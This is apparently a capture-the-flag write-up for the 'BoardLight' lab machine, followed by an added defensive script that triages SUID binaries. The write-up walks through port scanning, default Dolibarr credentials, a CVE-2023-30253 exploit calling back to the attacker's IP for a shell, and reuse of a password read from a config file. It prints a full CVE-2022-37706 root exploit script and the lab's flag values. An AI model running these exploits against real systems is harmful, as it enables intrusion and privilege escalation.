Information Gathering
IP Address | Open Ports |
---|---|
10.10.11.11 | TCP:22,80 |
$ nmap -p- 10.10.11.11 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8221/tcp filtered unknown
9564/tcp filtered unknown
19285/tcp filtered unknown
19837/tcp filtered unknown
20734/tcp filtered unknown
24875/tcp filtered unknown
26918/tcp filtered unknown
36270/tcp filtered unknown
36538/tcp filtered unknown
38225/tcp filtered unknown
40483/tcp filtered unknown
53279/tcp filtered unknown
56489/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP && Subdomain Enumeration
$ whatweb 10.10.11.11
# sudo echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949
# sudo echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
http://crm.board.htb/
username:admin password:admin
https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
$ python3 exp.py http://crm.board.htb admin admin 10.10.16.24 10032
www-data@boardlight:~/html$ cat ./crm.board.htb/htdocs/conf/conf.php
username:dolibarrowner
password:serverfun2$2023!!
$ ssh [email protected]
User.txt
b7f82dc5b4ed058a7ea007f02cafde10
Privilege Escalation
larissa@boardlight:/tmp$ find / -perm -4000 -type f 2>/dev/null
https://www.exploit-db.com/exploits/51180
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:/tmp$ chmod +x exp.sh
larissa@boardlight:/tmp$ bash exp.sh
Root.txt
f1844b04972e657f7e59544e69e23c20
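The SUID enumeration step above (`find / -perm -4000 -type f`), seen from the defender's side: an added example, not part of the original write-up, that triages that command's output against a baseline so a helper like `enlightenment_sys` stands out before anyone abuses it. The baseline list and the sample paths are constructed assumptions, and `triage_suid` is a hypothetical helper name.

```shell
#!/bin/bash
# Added example: triage `find / -perm -4000 -type f` output against a baseline.

# Assumed baseline of expected SUID binaries (constructed; build yours from a clean image).
BASELINE="/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd"

# Constructed sample input; the paths are illustrative, not output captured from the box.
SAMPLE_FIND_OUTPUT="/usr/bin/sudo
/usr/bin/passwd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/openssh/ssh-keysign
/tmp/rootshell"

# Reads SUID paths on stdin and prints one "LEVEL path (reason)" line for
# every path that is not in the baseline.
triage_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # Whole-line fixed-string match: a substring of a baseline entry must not pass.
        if printf '%s\n' "$BASELINE" | grep -Fxq -- "$path"; then
            continue
        fi
        case "$path" in
            */enlightenment_sys)
                echo "HIGH $path (helper targeted by CVE-2022-37706)" ;;
            /tmp/*|/var/tmp/*|/dev/shm/*)
                echo "HIGH $path (SUID file in a world-writable directory)" ;;
            *)
                echo "REVIEW $path (not in baseline)" ;;
        esac
    done
}

# Demo on the constructed sample. On a live host, as root:
#   find / -perm -4000 -type f 2>/dev/null | triage_suid
printf '%s\n' "$SAMPLE_FIND_OUTPUT" | triage_suid
```

A binary flagged HIGH should be patched or removed, or have its SUID bit dropped if nothing on the host needs it.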